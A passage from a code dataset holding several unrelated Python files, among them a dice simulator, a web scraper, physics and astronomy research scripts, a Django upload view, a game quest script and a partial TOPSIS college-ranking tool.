fair_dice.py\n // Author : James Kasakyan, Fall 2015\n // Version : 1.0\n // Description : See readme.txt\n //============================================================================\n'''\n\nfrom random import random\n\n\n# Given a list of dice roll probabilities for a six sided dice, an integer value for number of tosses, and an integer value for desired\n# number of fair tosses, will return a dictionary of fair rolls where each Pn ~ 1/6 = .1666666666 assuming large enough values for\n# num_tosses and fair_rolls_to_produce\n\ndef fair_dice(probability_list, num_tosses, fair_rolls_to_produce):\n\n fair_roll_dictionary = {\n \"P0\": 0,\n \"P1\": 0,\n \"P2\": 0,\n \"P3\": 0,\n \"P4\": 0,\n \"P5\": 0\n }\n for x in range(0,fair_rolls_to_produce):\n\n dice_list = produce_rolls(probability_list, 
num_tosses)\n sum_dice = 0\n for i in range (0,6):\n sum_dice += (i * dice_list[i])\n\n\n fair_roll = sum_dice % 6\n\n if fair_roll == 0:\n fair_roll_dictionary[\"P0\"] += 1\n elif fair_roll == 1:\n fair_roll_dictionary[\"P1\"] += 1\n elif fair_roll == 2:\n fair_roll_dictionary[\"P2\"] += 1\n elif fair_roll == 3:\n fair_roll_dictionary[\"P3\"] += 1\n elif fair_roll == 4:\n fair_roll_dictionary[\"P4\"] += 1\n elif fair_roll == 5:\n fair_roll_dictionary[\"P5\"] += 1\n else:\n print(\"Control should not reach here. Fair roll = \" + str(fair_roll))\n\n return fair_roll_dictionary\n\n\n\n\n\n# Given a list of probabilities for six-sided dice rolls and an integer \"num_tosses\", produces a list\n# that contains the results of performing \"num_tosses\" tosses with given probabilities. Assumes \"probability_list\"\n# input list contains probabilities of rolls in the order [P0, P1, P2, P3, P4, P5] and returns list in same order\ndef produce_rolls(probability_list, num_tosses):\n dice_list = [0,0,0,0,0,0]\n # Create tuples with mapped ranges. Ex: P0 = P1 = P2 = P3 = P4 = .2, P5 = 0 produces tuples:\n # P0_range (0, .2), P1_range (.2, .4), P2_range (.4, .6), P3_range(.6,.8), P4_range(.8, 1.0), P5_range(1.0, 1.0)\n\n P0_range = 0, round(probability_list[0],5)\n P1_range = round(P0_range[1],5) , round(P0_range[1] + probability_list[1], 5)\n P2_range = round(P1_range[1],5) , round(P1_range[1] + probability_list[2], 5)\n P3_range = round(P2_range[1],5) , round(P2_range[1] + probability_list[3], 5)\n P4_range = round(P3_range[1],5) , round(P3_range[1] + probability_list[4], 5)\n P5_range = round(P4_range[1],5) , round(P4_range[1] + probability_list[5], 5)\n\n for i in range(0, num_tosses):\n\n rand_num = round(random(),5)\n if rand_num >= P0_range[0] and rand_num <= P0_range[1]:\n dice_list[0] += 1\n\n elif rand_num >= P1_range[0] and rand_num <= P1_range[1]:\n dice_list[1] += 1\n\n elif rand_num >= P2_range[0] and rand_num <= P2_range[1]:\n dice_list[2] += 1\n\n elif rand_num >= P3_range[0] and rand_num <= P3_range[1]:\n dice_list[3] += 1\n\n elif rand_num >= P4_range[0] and rand_num <= P4_range[1]:\n dice_list[4] += 1\n\n elif rand_num >= P5_range[0] and rand_num <= P5_range[1]:\n dice_list[5] += 1\n\n else:\n print(str(rand_num) + \" not in any range. This should not occur.\")\n\n return dice_list\n\n# Gather a list of six probabilities for six-sided dice from user\ndef query_probabilities():\n probability_list = []\n\n while ((sum(probability_list)) != 1.00):\n if len(probability_list) != 0:\n print(\"Probability values did not sum to 1.00. Sum = \" + str(sum(probability_list)))\n probability_list.clear()\n while (len(probability_list) != 6):\n x = input(\"Enter probability value for P\" + str(len(probability_list)) + \". Current sum is \" + str(round((sum(probability_list)), 5)) + \" : \")\n user_input = float(x)\n\n if user_input >= 0 and user_input <= 1.00:\n\n if ((sum(probability_list)) + user_input > 1.00):\n print(\"Sum of probabilities cannot exceed 1.00. 
Current sum = \" + str(round((sum(probability_list)), 5)))\n\n else:\n probability_list.append(round(user_input, 5))\n\n # Invalid user input\n else:\n print(\"Must enter a number between 0 and 1.00\")\n\n return probability_list\n","sub_path":"Fair-Dice-Generator/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":4581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"388969238","text":"from bs4 import BeautifulSoup\nimport requests\n\nclass WebScrap():\n\tdef __init__(self):\n\t\tpass\n\n\tdef getHTML(self, url):\n\t\treturn requests.get(url).text\n\n\tdef makeSoup(self, html_content):\n\t\treturn BeautifulSoup(html_content, 'lxml')\n\n\t#This function will return all the links of a webpage except in-page anchor links (starting with #)\n\tdef getAllLinks(self, html_soup):\n\t\tall_links = html_soup.find_all('a')\n\t\tvalid_links=[]\n\n\t\tfor link_content in all_links:\n\t\t\tlink_a = link_content['href']\n\t\t\t#Validating the link\n\t\t\tif len(link_a)>0 and link_a[0] != '#':\n\t\t\t\tif '#' in link_a:\n\t\t\t\t\tchar_idx = link_a.find('#')\n\t\t\t\t\tnew_link = link_a[:char_idx]\n\t\t\t\telse:\n\t\t\t\t\tnew_link = link_a\n\n\t\t\t\tif new_link not in valid_links:\n\t\t\t\t\tvalid_links.append(new_link)\n\t\treturn valid_links\n\n\tdef getAllLinksText(self, html_soup):\n\t\tall_links = html_soup.find_all('a')\n\t\tvalid_links_text=[]\n\n\t\tfor link_content in all_links:\n\t\t\tlink_a = link_content['href']\n\t\t\t#Validating the link\n\t\t\tif len(link_a)>0 and link_a[0] != '#':\n\t\t\t\tif '#' in link_a:\n\t\t\t\t\tchar_idx = link_a.find('#')\n\t\t\t\t\tnew_link = link_a[:char_idx]\n\t\t\t\telse:\n\t\t\t\t\tnew_link = link_a\n\n\t\t\t\tif new_link not in valid_links_text:\n\t\t\t\t\tvalid_links_text.append(link_content.text)\n\t\treturn valid_links_text\n\n\t#This function will get the urls of all the images in a page\n\tdef getImgLinks(self, html_soup):\n\t\timg_links = html_soup.find_all('img')\n\t\timg_links = map(lambda x: x['src'], img_links)\n\t\treturn list(img_links)\n\n\t#This function will get the text content of the given elements\n\tdef getContent(self, elements):\n\t\treturn list(map(lambda x: x.text, elements))\n\n\t#This function will get the text data in a page\n\tdef getTextData(self, html_soup):\n\t\ttext_data=[]\n\t\ttext_data += self.getContent(html_soup.find_all('p'))\n\t\ttext_data += self.getContent(html_soup.find_all('a'))\n\t\ttext_data += self.getContent(html_soup.find_all('div',class_='bigtitle'))\n\t\ttext_data += self.getContent(html_soup.find_all('h1'))\n\t\ttext_data += self.getContent(html_soup.find_all('h2'))\n\t\ttext_data += self.getContent(html_soup.find_all('h3'))\n\t\ttext_data += self.getContent(html_soup.find_all('h4'))\n\t\ttext_data += self.getContent(html_soup.find_all('h5'))\n\t\treturn text_data\n\nbaseURL='http://midas.iiitd.edu.in'\nmidaslab = WebScrap()\nweb_content = midaslab.getHTML(baseURL)\t\t\nsoup = midaslab.makeSoup(web_content) \nlinks = midaslab.getAllLinks(soup)\nlinks_text = midaslab.getAllLinksText(soup)\n#Navigation pages URL\nnav_pages_links = links[:8]\nnav_pages_links_text = links_text[:8]\n#Iterating over all the navigation links to find out the urls of images and writing it to the file\npageno=1\nwith open('imglinks.txt', 'w') as f:\n\tfor linkno in range(0,len(nav_pages_links)):\n\t\tnav_url=nav_pages_links[linkno]\n\t\tnav_text=nav_pages_links_text[linkno]\n\t\tweb_content_navpage = 
midaslab.getHTML(baseURL+nav_url)\n\t\tsoup_navpage = midaslab.makeSoup(web_content_navpage)\n\t\timglinks = midaslab.getImgLinks(soup_navpage)\n\t\tf.write('Page No-{}, Name - {}\\n'.format(pageno,nav_text))\n\t\tf.write('Page Link- {}{}\\n'.format(baseURL,nav_url))\n\t\tf.write('Image Links--\\n')\n\t\tfor img_link in imglinks:\n\t\t\tf.write(\"{}{}\\n\".format(baseURL,img_link))\n\t\tf.write('----------------------------------\\n'.format(pageno))\n\t\tpageno += 1\n\n#Iterating over all the navigation links to find out the text data and writing it to the file\npageno=1\nwith open('textdata.txt', 'w') as f:\n\tfor linkno in range(0,len(nav_pages_links)):\n\t\tnav_url=nav_pages_links[linkno]\n\t\tnav_text=nav_pages_links_text[linkno]\n\t\tweb_content_navpage = midaslab.getHTML(baseURL+nav_url)\n\t\tsoup_navpage = midaslab.makeSoup(web_content_navpage)\n\t\ttextdata = midaslab.getTextData(soup_navpage)\n\t\tf.write('Page No-{}, Name - {}\\n'.format(pageno,nav_text))\n\t\tf.write('Page Link- {}{}\\n'.format(baseURL,nav_url))\n\t\tf.write('Text Data--\\n')\n\t\tfor textdata_row in textdata:\n\t\t\tf.write(\"{}\\n\".format(textdata_row))\n\t\tf.write('----------------------------------\\n\\n'.format(pageno))\n\t\tpageno += 1\n\n\n","sub_path":"ws_midaslabs.py","file_name":"ws_midaslabs.py","file_ext":"py","file_size_in_byte":3978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"40973743","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport time\nimport os\nimport torch\nimport _pickle as cPickle\nfrom src.RL import RL\nfrom src.toric_model import Toric_code\nfrom NN import NN_11, NN_17\nfrom ResNet import ResNet18, ResNet34, ResNet50, ResNet101, ResNet152\n\nt0 = time.time()\n\ndef get_results(system_size, NETWORK_FILE_NAME, network):\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n num_of_predictions = 3000\n\n # initialize RL class\n rl = RL(Network=network,\n Network_name=NETWORK_FILE_NAME,\n system_size=system_size,\n device=device)\n\n # Generate folder structure, all results are stored in the data folder \n timestamp = time.strftime(\"%y_%m_%d__%H_%M_%S__\")\n PATH = f'data/d_{system_size}/results__' + str(NETWORK_FILE_NAME) + '__' + timestamp\n if not os.path.exists(PATH):\n os.makedirs(PATH)\n\n # Path for the network to use for the prediction\n PATH2 = 'network/' + str(NETWORK_FILE_NAME) + '.pt'\n\n win_rates = []\n\n with open(PATH + '/data_all', 'w+') as f:\n\n f.write('network, p_error, num_of_predictions, error corrected, ground state conserved, average number of steps, number of failed syndroms, win_rate')\n\n p_errors = np.arange(0.05, 0.17, 0.02)\n\n for error in p_errors:\n\n f.write('\\n')\n \n error_corrected_list, ground_state_list, average_number_of_steps_list, failed_syndroms, prediction_list_p_error = rl.prediction(\n num_of_predictions=num_of_predictions, \n num_of_steps=50, \n PATH=PATH2, \n prediction_list_p_error=[error],\n plot_one_episode=False)\n\n win_rate = (num_of_predictions - len(failed_syndroms)/2) / num_of_predictions\n win_rates.append(win_rate)\n\n for result in [NETWORK_FILE_NAME, error, num_of_predictions, error_corrected_list[0], ground_state_list[0],average_number_of_steps_list[0], len(failed_syndroms)/2, win_rate]:\n f.write(str(result) + ', ')\n\n return p_errors, win_rates\n\nnets = [(5, 'size_5_size_5_NN_11_epoch_79', NN_11), (7, 'size_7_size_7_size_7_NN_11_epoch_178_epoch_21', NN_11), (9, 'size_9_size_9_NN_11_epoch_279', NN_11), (11, 
'size_11_size_11_NN_11_epoch_207', NN_11)]\n\nresults_nets = [get_results(*net) for net in nets]\n\nfig, ax = plt.subplots(figsize=(12, 8))\n\nax.scatter(results_nets[0][0], results_nets[0][1], s=100, label='d = 5', color='steelblue', marker='o')\nax.scatter(results_nets[1][0], results_nets[1][1], s=100, label='d = 7', color='green', marker='D')\nax.scatter(results_nets[2][0], results_nets[2][1], s=100, label='d = 9', color='orange', marker='X')\nax.scatter(results_nets[3][0], results_nets[3][1], s=100, label='d = 11', color='firebrick', marker='^')\n\n# ax.scatter(P_error11, P_success11,s=100, label='d = '+str(system_size11), color='firebrick', marker='^')\n# ax.scatter(P_error13, P_success13,s=100, label='d = '+str(system_size13), color='saddlebrown', marker='s')\nax.legend(fontsize=14)\nax.plot(results_nets[0][0], results_nets[0][1], color='steelblue')\nax.plot(results_nets[1][0], results_nets[1][1], color='green')\nax.plot(results_nets[2][0], results_nets[2][1], color='orange')\nax.plot(results_nets[3][0], results_nets[3][1], color='firebrick')\n# ax.plot(P_error11,P_success11, color='firebrick')\n# ax.plot(P_error13,P_success13, color='saddlebrown')\n#ax.set_xlim(0.005, 0.205)\nplt.xlabel('$P_e$', fontsize=20)\nplt.ylabel('$P_s$', fontsize=20)\nplt.title('Prestanda för tränade agenter', fontsize=20)\nplt.tick_params(axis='both', labelsize=14)\nplt.savefig('plots/results_' + time.strftime(\"%y_%m_%d__%H_%M_%S__\") + '.png')\nplt.show()\n\nprint('tid:', time.time() - t0, 's')","sub_path":"plot_predictions.py","file_name":"plot_predictions.py","file_ext":"py","file_size_in_byte":3736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"603426451","text":"# imports, etc.\nimport galsim\nimport galsim.wfirst as wf\nimport datetime\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom radec_to_chip import *\n\n# Make a list of RA/dec central values and nearby values\nn_vals = 100\nseed = 314159\nud = galsim.UniformDeviate(seed=seed)\nmin_ra = 0.0\nmax_ra = 360.0\nmin_cos_dec = -0.95\nmax_cos_dec = 0.3\nra_cen_vals = np.zeros(n_vals)\ndec_cen_vals = np.zeros(n_vals)\nra_vals = np.zeros(n_vals)\ndec_vals = np.zeros(n_vals)\ndelta_dist = 0.5 # degrees offset allowed for (ra, dec) compared to center of focal plane\nchris_sca = np.zeros(n_vals).astype(int)\npa_arr = np.zeros(n_vals)\ndate = datetime.datetime(2025, 1, 12)\nfor i in range(n_vals):\n # Keep choosing random FPA center positions until we get one that can be observed on the chosen\n # date.\n pa = None\n while (pa is None):\n ra_cen_vals[i] = min_ra + (max_ra-min_ra)*ud()\n dec_cen_vals[i] = \\\n 90.0-(180.0/np.pi)*np.arccos(min_cos_dec + (max_cos_dec-min_cos_dec)*ud())\n fpa_center = galsim.CelestialCoord(\n ra=ra_cen_vals[i]*galsim.degrees,\n dec=dec_cen_vals[i]*galsim.degrees)\n pa = wf.bestPA(fpa_center, date)\n pa_arr[i] = pa / galsim.radians\n ra_vals[i] = ra_cen_vals[i] + delta_dist*(ud()-0.5)*np.cos(dec_cen_vals[i]*np.pi/180.)\n dec_vals[i] = dec_cen_vals[i] + delta_dist*(ud()-0.5)\n # Find the SCAs from Chris's code (Python version) for the same points (0=not on an SCA)\n chris_sca[i] = radec_to_chip(np.array([ra_cen_vals[i]*np.pi/180.0]),\n np.array([dec_cen_vals[i]*np.pi/180.0]),\n np.array([pa]),\n np.array([ra_vals[i]*np.pi/180.]),\n np.array([dec_vals[i]*np.pi/180.]))\n\nout_data = np.column_stack((ra_cen_vals, dec_cen_vals, ra_vals, dec_vals, pa_arr, chris_sca))\nnp.savetxt('chris_comparison.txt', out_data, fmt='%.8f %.8f %.8f %.8f %.8f 
%d')\n\n","sub_path":"tests/wfirst_files/gen_chris_comparison.py","file_name":"gen_chris_comparison.py","file_ext":"py","file_size_in_byte":1964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"478090191","text":"# coding=utf-8\n# --------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for\n# license information.\n#\n# Code generated by Microsoft (R) AutoRest Code Generator.\n# Changes may cause incorrect behavior and will be lost if the code is\n# regenerated.\n# --------------------------------------------------------------------------\n\nfrom .sub_resource_py3 import SubResource\n\n\nclass LoadBalancingSettingsModel(SubResource):\n \"\"\"Load balancing settings for a backend pool.\n\n Variables are only populated by the server, and will be ignored when\n sending a request.\n\n :param id: Resource ID.\n :type id: str\n :param sample_size: The number of samples to consider for load balancing\n decisions\n :type sample_size: int\n :param successful_samples_required: The number of samples within the\n sample period that must succeed\n :type successful_samples_required: int\n :param additional_latency_milliseconds: The additional latency in\n milliseconds for probes to fall into the lowest latency bucket\n :type additional_latency_milliseconds: int\n :param resource_state: Resource status. Possible values include:\n 'Creating', 'Enabling', 'Enabled', 'Disabling', 'Disabled', 'Deleting'\n :type resource_state: str or\n ~azure.mgmt.frontdoor.models.FrontDoorResourceState\n :param name: Resource name.\n :type name: str\n :ivar type: Resource type.\n :vartype type: str\n \"\"\"\n\n _validation = {\n 'type': {'readonly': True},\n }\n\n _attribute_map = {\n 'id': {'key': 'id', 'type': 'str'},\n 'sample_size': {'key': 'properties.sampleSize', 'type': 'int'},\n 'successful_samples_required': {'key': 'properties.successfulSamplesRequired', 'type': 'int'},\n 'additional_latency_milliseconds': {'key': 'properties.additionalLatencyMilliseconds', 'type': 'int'},\n 'resource_state': {'key': 'properties.resourceState', 'type': 'str'},\n 'name': {'key': 'name', 'type': 'str'},\n 'type': {'key': 'type', 'type': 'str'},\n }\n\n def __init__(self, *, id: str=None, sample_size: int=None, successful_samples_required: int=None, additional_latency_milliseconds: int=None, resource_state=None, name: str=None, **kwargs) -> None:\n super(LoadBalancingSettingsModel, self).__init__(id=id, **kwargs)\n self.sample_size = sample_size\n self.successful_samples_required = successful_samples_required\n self.additional_latency_milliseconds = additional_latency_milliseconds\n self.resource_state = resource_state\n self.name = name\n self.type = None\n","sub_path":"src/front-door/azext_front_door/vendored_sdks/models/load_balancing_settings_model_py3.py","file_name":"load_balancing_settings_model_py3.py","file_ext":"py","file_size_in_byte":2723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"213010604","text":"from django.shortcuts import get_object_or_404, render_to_response\nfrom django.conf import settings\nfrom django.http import HttpResponse, HttpResponseBadRequest\nfrom models import MultiuploaderImage\nfrom django.core.files.uploadedfile import UploadedFile\nfrom staging.models import CompSlide, Comp\nfrom django.forms.models import inlineformset_factory\nfrom 
django.template import loader, Context\nfrom django.contrib.admin import widgets, helpers\nfrom stager.staging.admin import CompSlideInline, CompAdmin\nfrom stager.staging.forms import *\nfrom django.db import transaction\nfrom django.contrib import admin\nfrom stager.staging.decorators import superuser_only\n\n#importing json parser to generate jQuery plugin friendly json response\nfrom django.utils import simplejson\n\n#for generating thumbnails\n#sorl-thumbnails must be installed and properly configured\nfrom sorl.thumbnail import get_thumbnail\n\n\nfrom django.views.decorators.csrf import csrf_exempt\n\nimport os\nimport logging\nlog = logging\n\n@csrf_exempt\ndef multiuploader_delete(request, pk):\n \"\"\"\n View for deleting photos with multiuploader AJAX plugin.\n made from api on:\n https://github.com/blueimp/jQuery-File-Upload\n \"\"\"\n if request.method == 'POST':\n log.info('Called delete image. image id='+str(pk))\n image = get_object_or_404(MultiuploaderImage, pk=pk)\n image.delete()\n log.info('DONE. Deleted photo id='+str(pk))\n return HttpResponse(str(pk))\n else:\n log.info('Received not POST request to delete image view')\n return HttpResponseBadRequest('Only POST accepted')\n\n@csrf_exempt\n@superuser_only\ndef multiuploader(request):\n \"\"\"\n Main Multiuploader module.\n Parses data from jQuery plugin and makes database changes.\n \"\"\"\n if request.method == 'POST':\n with transaction.commit_on_success():\n comp_id = request.POST.get('compId', None)\n try:\n comp = Comp.objects.get(id=comp_id)\n except:\n return HttpResponseBadRequest('Comp Does Not Exist')\n log.info('received POST to main multiuploader view')\n if not request.FILES:\n return HttpResponseBadRequest('Must have files attached!')\n \n #getting file data for further manipulations\n file = request.FILES[u'files[]']\n \n wrapped_file = UploadedFile(file)\n filename = wrapped_file.name\n file_size = wrapped_file.file.size\n prepared_filename = os.path.splitext(filename)[0].replace('_', ' ').title()\n slide = CompSlide()\n slide.title = prepared_filename\n slide.image = file\n slide.comp = comp\n slide.name = prepared_filename\n slide.save()\n comp.save()\n\n log.info('Got file: \"%s\"' % str(filename))\n log.info('Content type: \"%s\"' % file.content_type)\n \n log.info('File saving done')\n #settings imports\n with transaction.commit_on_success():\n #get the current site\n admin_site = admin.site\n compAdmin = CompAdmin(Comp, admin_site)\n \n #get all possible inlines for the parent Admin\n inline_instances = compAdmin.get_inline_instances(request)\n prefixes = {}\n \n for FormSet, inline in zip(compAdmin.get_formsets(request, comp), inline_instances):\n #get the inline of interest and generate its formset\n if isinstance(inline, CompSlideInline):\n prefix = FormSet.get_default_prefix()\n prefixes[prefix] = prefixes.get(prefix, 0) + 1\n if prefixes[prefix] != 1 or not prefix:\n prefix = \"%s-%s\" % (prefix, prefixes[prefix])\n formset = FormSet(instance=comp, prefix=prefix, queryset=inline.queryset(request))\n \n #get possible fieldsets, readonly, and prepopulated information for the parent Admin\n fieldsets = list(inline.get_fieldsets(request, comp))\n readonly = list(inline.get_readonly_fields(request, comp))\n prepopulated = dict(inline.get_prepopulated_fields(request, comp))\n \n #generate the inline formset\n inline_admin_formset = helpers.InlineAdminFormSet(inline, formset,\n fieldsets, prepopulated, readonly, model_admin=compAdmin)\n\n #render the template\n t = 
loader.get_template('admin/staging/edit_inline/_comp_slide_drag_upload_ajax.html')\n c = Context({ 'inline_admin_formset': inline_admin_formset })\n rendered = t.render(c)\n result = []\n result.append({\"name\":filename, \n \"size\":file_size, \n \"delete_type\":\"POST\",\n \"html\": rendered })\n response_data = simplejson.dumps(result)\n \n #checking for json data type\n #big thanks to Guy Shapiro\n if \"application/json\" in request.META['HTTP_ACCEPT_ENCODING']:\n mimetype = 'application/json'\n else:\n mimetype = 'text/plain'\n return HttpResponse(response_data, mimetype=mimetype)\n else: #GET\n return HttpResponse('Only POST accepted')\n\ndef multi_show_uploaded(request, key):\n \"\"\"Simple file view helper.\n Used to show uploaded file directly\"\"\"\n image = get_object_or_404(MultiuploaderImage, key_data=key)\n url = settings.MEDIA_URL+image.image.name\n return render_to_response('multiuploader/one_image.html', {\"multi_single_url\":url,})","sub_path":"stager/multiuploader/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"292610672","text":"# By L2J_JP SANDMAN\nfrom l2server.gameserver.model.quest import State\nfrom l2server.gameserver.model.quest.jython import QuestJython as JQuest\n\nqn = \"119_LastImperialPrince\"\n\n# NPC\nSPIRIT = 31453 # Nameless Spirit\nDEVORIN = 32009 # Devorin\n\n# ITEM\nBROOCH = 7262 # Antique Brooch\n\n# REWARD\nADENA = 57 # Adena\nAMOUNT = 150292 # Amount\n\n\nclass Quest(JQuest):\n def __init__(self, id, name, descr):\n JQuest.__init__(self, id, name, descr)\n\n def onEvent(self, event, st):\n htmltext = event\n if event == \"31453-4.htm\":\n st.set(\"cond\", \"1\")\n st.setState(State.STARTED)\n st.playSound(\"ItemSound.quest_accept\")\n elif event == \"32009-2.htm\":\n if st.getQuestItemsCount(BROOCH) < 1:\n htmltext = \"Quest Four Goblets is not accomplished or the condition is not suitable.\"\n st.exitQuest(1)\n elif event == \"32009-3.htm\":\n st.set(\"cond\", \"2\")\n st.playSound(\"ItemSound.quest_middle\")\n elif event == \"31453-7.htm\":\n st.giveItems(ADENA, AMOUNT)\n st.addExpAndSp(902439, 90067)\n st.setState(State.COMPLETED)\n st.playSound(\"ItemSound.quest_finish\")\n st.exitQuest(1)\n return htmltext\n\n def onTalk(Self, npc, player):\n st = player.getQuestState(qn)\n htmltext = Quest.getNoQuestMsg(player)\n if not st: return htmltext\n cond = st.getInt(\"cond\")\n npcId = npc.getNpcId()\n id = st.getState()\n if st.getQuestItemsCount(BROOCH) < 1:\n htmltext = \"Quest Four Goblets is not accomplished or the condition is not suitable.\"\n st.exitQuest(1)\n elif id == State.CREATED:\n if player.getLevel() < 74:\n htmltext = \"Quest for characters level 74 and above.\"\n st.exitQuest(1)\n else:\n htmltext = \"31453-1.htm\"\n elif id == State.COMPLETED:\n htmltext = Quest.getAlreadyCompletedMsg(player)\n st.exitQuest(1)\n elif npcId == SPIRIT:\n if cond == 1:\n htmltext = \"31453-4.htm\"\n elif cond == 2:\n htmltext = \"31453-5.htm\"\n elif npcId == DEVORIN:\n if cond == 1:\n htmltext = \"32009-1.htm\"\n elif cond == 2:\n htmltext = \"32009-3.htm\"\n return htmltext\n\n\nQUEST = Quest(119, qn, \"Last Imperial 
Prince\")\n\nQUEST.addStartNpc(SPIRIT)\n\nQUEST.addTalkId(SPIRIT)\nQUEST.addTalkId(DEVORIN)\n","sub_path":"data/scripts/quests/119_LastImperialPrince/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"592160074","text":"# @Time : 2019/5/18 17:30\n# @Author: Root\n# @File : Topsis.py\n\n\nimport openpyxl\nimport os\nimport numpy as np\nimport paranoid_root.contests.mathematical_modeling.group_a.Utility as uti\nimport random\nimport math\n\n\nclass College(object):\n \"\"\"\n # 在这个类中完成对大学的构建\n \"\"\"\n id = \"\"\n name = \"\"\n totalClicks = 0\n monthClicks = 0\n weekClicks = 0\n location = \"\"\n isDirected = -1\n is985 = -1\n is211 = -1\n schoolType = \"\"\n majors = {}\n furtherStudyRate = 0.0\n workRate = 0.0\n schoolScore = 0.0\n\n def __init__(self, _id, _name, _totalClks, _monthClks, _weekClks, _location, _isDirected, _is985,\n _is211, _schoolType, _majors,\n futherRate=0.0, workRate=0.0, _schoolScore=0.0):\n self.id = _id\n self.name = _name\n self.totalClicks = _totalClks\n self.monthClicks = _monthClks\n self.weekClicks = _weekClks\n self.location = _location\n self.isDirected = _isDirected\n self.is985 = _is985\n self.is211 = _is211\n self.schoolType = _schoolType\n self.majors = _majors\n self.furtherStudyRate = futherRate\n self.workRate = workRate\n self.schoolScore = _schoolScore\n\n @classmethod\n def buildByXlsRow(cls, row, workSheet):\n \"\"\"\n 通过row来构建一个College对象\n :param row:\n :param workSheet:\n :return:\n \"\"\"\n id = workSheet.cell(row, 1).value\n name = workSheet.cell(row, 2).value\n totalClks = int(workSheet.cell(row, 3).value)\n monthClks = int(workSheet.cell(row, 4).value)\n weekClks = int(workSheet.cell(row, 5).value)\n location = workSheet.cell(row, 6).value\n isDrcted = int(workSheet.cell(row, 7).value)\n is985 = int(workSheet.cell(row, 8).value)\n is211 = int(workSheet.cell(row, 9).value)\n schoolType = workSheet.cell(row, 10).value\n\n majorStr = workSheet.cell(row, 11).value\n majors = majorStr.split(\"、\")\n majors = set([major for major in majors if major != None and major != \"\"])\n\n furtherStudyRate = 0.0\n workRate = 0.0\n schoolScore = 0.0\n\n if workSheet.cell(row, 12).value:\n furtherStudyRate = float(workSheet.cell(row, 12).value)\n workRate = float(workSheet.cell(row, 13).value)\n schoolScore = float(workSheet.cell(row, 14).value)\n\n t = College(id, name, totalClks, monthClks, weekClks, location,\n isDrcted, is985, is211,\n schoolType, majors, furtherStudyRate, workRate,\n schoolScore)\n return t\n\n def __str__(self):\n return (self.id, self.name, self.location,\n self.totalClicks, self.monthClicks, self.weekClicks,\n \"直属\" if self.isDirected else \"非直属\",\n \"985\" if self.is985 else \"非985\",\n \"211\" if self.is211 else \"非211\",\n self.schoolType,\n str(self.majors)\n ).__str__()\n\n def getMostSimilarMajorValue(self, majorStr):\n calculator = uti.Majors(self.majors)\n ans = calculator.getTopNSimilarity(majorStr)[0][0]\n return ans\n\n\nclass Colleges(object):\n \"\"\"\n # 这个类完成构建所有的大学\n \"\"\"\n xlsPath = \"\" # 注意是absPath\n workBook = None\n workSheet = None\n collegeDict = None\n\n def __init__(self, xlsPath=os.path.join(os.getcwd(), r\"data\\allCollegeInfos.xlsx\")):\n self.xlsPath = xlsPath\n self.workBook = openpyxl.load_workbook(self.xlsPath)\n self.workSheet = self.workBook.worksheets[0]\n self.collegeDict = dict()\n maxRow = self.workSheet.max_row\n for row in range(1, maxRow + 1):\n college = 
College.buildByXlsRow(row, self.workSheet)\n self.collegeDict[college.name] = self.collegeDict[college.id] = college\n\n def getCollegeByName(self, collegeName):\n return self.collegeDict[collegeName]\n\n def getCollegeById(self, collegeId):\n return self.collegeDict[collegeId]\n\n\nclass Student(object):\n rank = -1\n wantedMajors = {}\n\n def __init__(self, rank, wantedMajors):\n self.rank = rank\n self.wantedMajors = wantedMajors\n\n def __str__(self):\n return (self.rank, str(self.wantedMajors)).__str__()\n\n\nclass Topsis(object):\n collegeNumber = 0\n student = None\n allColleges = None\n possibleColleges = None\n rMatrix = None\n weightVector = None\n promptStr = \" 专业匹配度 就业深造 整体实力 地理位置 社会认可度 专业热度 \"\n\n def __init__(self, byMan, collegeNumber, student: Student, schools):\n self.collegeNumber = collegeNumber\n self.student = student\n self.allColleges = Colleges()\n self.possibleColleges = []\n self.pickColleges(self.pickByFixedColleges, schools)\n self.buildRMatrix()\n if not byMan :\n self.weightVector = self.buildWeightVector()\n else :\n print(\"请输入一个6 * 6的矩阵 : \")\n self.weightVector = np.zeros((6, 6) )\n lines = [ input() for i in range(6)]\n for row, line in enumerate(lines) :\n parts = line.strip().split()\n for col, part in enumerate(parts) :\n value = float(eval(part))\n self.weightVector[row][col] = value\n self.weightVector = self.getWeightVector(self.weightVector, 6)\n\n\n\n def buildRMatrix(self):\n \"\"\"\n 通过学生的信息构建出一个R矩阵\n :return:\n \"\"\"\n self.rMatrix = np.zeros((self.collegeNumber, 6) )\n print(self.rMatrix)\n self.initializeColZero()\n self.initializeColOne()\n self.initializeColTwo()\n self.initializeColThree()\n self.initializeColFour()\n self.initializeColFive()\n\n print(\"after col normalized : \")\n self.rMatrix = self.normalizeMatrixByCols(self.rMatrix)\n print(self.rMatrix)\n print(\"total normalized : \")\n print(self.promptStr)\n self.rMatrix = self.normalizeMatrix(self.rMatrix)\n print(self.rMatrix)\n for i, college in enumerate(self.possibleColleges) :\n print(i, college.name)\n\n def buildWeightVector(self):\n \"\"\"\n 生成v矩阵并返回\n :return:\n \"\"\"\n input(\"\\r\\n请学生对各个因素之比进行模糊打分 : \")\n print(\"学生打分为 :\")\n print(self.promptStr)\n t = self.buildWeightMatrix(6)\n print(t)\n t = self.getWeightVector(t, 6)\n print(\"生成的权重向量为 : \")\n print(t)\n return t\n\n def pickColleges(self, picker, *args):\n \"\"\"\n 传入一个pciker函数\n :param picker:\n :return:\n \"\"\"\n names = picker(*args)\n for name in names:\n 